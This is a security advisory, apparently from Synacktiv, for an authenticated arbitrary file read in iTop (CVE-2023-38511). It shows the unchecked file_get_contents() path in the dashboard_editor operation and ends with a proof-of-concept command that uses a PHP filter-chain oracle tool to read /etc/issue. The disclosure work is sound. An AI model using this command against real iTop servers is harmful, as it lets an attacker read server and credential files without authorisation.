File read in iTop
15/04/2024 - Téléchargement
Product
iTop
Severity
Medium
Fixed Version(s)
3.0.4, 3.1.1
Affected Version(s)
≤ 3.0.3
CVE Number
CVE-2023-38511
Authors
Description
Presentation
iTop is an application used for ticketing purposes and device management. It offers several levels of privileges, from simple users allowed to create tickets, to application administrators able to configure the application, manage users or devices.
Issue(s)
Synacktiv discovered a file read vulnerability in the iTop project due to missing validation of user-provided input. It is exploitable only from an authenticated user on the application's backend.
Timeline
| Date | Description |
|---|---|
| 2023.07.10 | Advisory sent to itop-security@combodo.com |
| 2023.07.19 | Vulnerabilities acknowledged done |
| 2023.11.28 | Release of version 3.1.1 |
| 2024.01.17 | Release of version 3.0.4 |
| 2024.04.15 | Public release |
Technical details
Description
The vulnerability resides in a call to the file_get_contents() function on a user-supplied parameter without prior verification.
The AJAX operation dashboard_editor allows any authenticated user on the backoffice to supply a file argument. This file is then transferred to the static method RuntimeDashboard::GetDashboardToEdit() in order to load a dashboard from a file, as showed in the following extract of the pages/ajax.render.php file line 1048:
<?php
[...]
case 'dashboard_editor':
$sId = utils::ReadParam('id', '', false, 'context_param');
[...]
$sDashboardFile = utils::ReadParam('file', '', false, 'string');
$sReloadURL = utils::ReadParam('reload_url', '', false, utils::ENUM_SANITIZATION_FILTER_URL);
$oDashboard = RuntimeDashboard::GetDashboardToEdit($sDashboardFile, $sId);
if (!is_null($oDashboard)) {
if (!empty($sReloadURL)) {
$oDashboard->SetReloadURL($sReloadURL);
}
$oDashboard->RenderEditor($oPage, $aExtraParams);
}
break;
[...]
?>
No sufficient check is performed in this method before reading the file's content.
[...]
public static function GetDashboardToEdit($sDashboardFile, $sDashBoardId)
{
$bCustomized = false;
// Search for an eventual user defined dashboard
$oUDSearch = new DBObjectSearch('UserDashboard');
$oUDSearch->AddCondition('user_id', UserRights::GetUserId(), '=');
$oUDSearch->AddCondition('menu_code', $sDashBoardId, '=');
$oUDSet = new DBObjectSet($oUDSearch);
// if id is in the database, read from it
if ($oUDSet->Count() > 0) {
// Assuming there is at most one couple {user, menu}!
$oUserDashboard = $oUDSet->Fetch();
$sDashboardDefinition = $oUserDashboard->Get('contents');
$bCustomized = true;
} else {
// Else read from file
$sDashboardDefinition = @file_get_contents($sDashboardFile);
}
// init dashbard from the content
[...]
If the provided sDashBoardId does not exist, the user-supplied file is then used in the file_get_contents() call.
Impact
Using this vulnerability and the php_filter_chains_oracle_exploit tool, it is possible to read arbitrary files on the remote server.
$ python3 filters_chain_oracle_exploit.py --target http://localhost/pages/ajax.render.php --headers '{"Cookie":"itop-bf***6g"}' --data '{"operation":"dashboard_editor", "id":"999999999"}' --parameter file --file /etc/issue
[*] Additionnal data used : {"operation":"dashboard_editor", "id":"999999999"}
[*] Additionnal headers used : {"Cookie":"itop-bf***6g"}
[+] File /etc/issue leak is finished!
b'RGViaWFuIEdOVS9MaW51eCAxMSBcbiBcbAoK'
Debian GNU/Linux 11 \n \l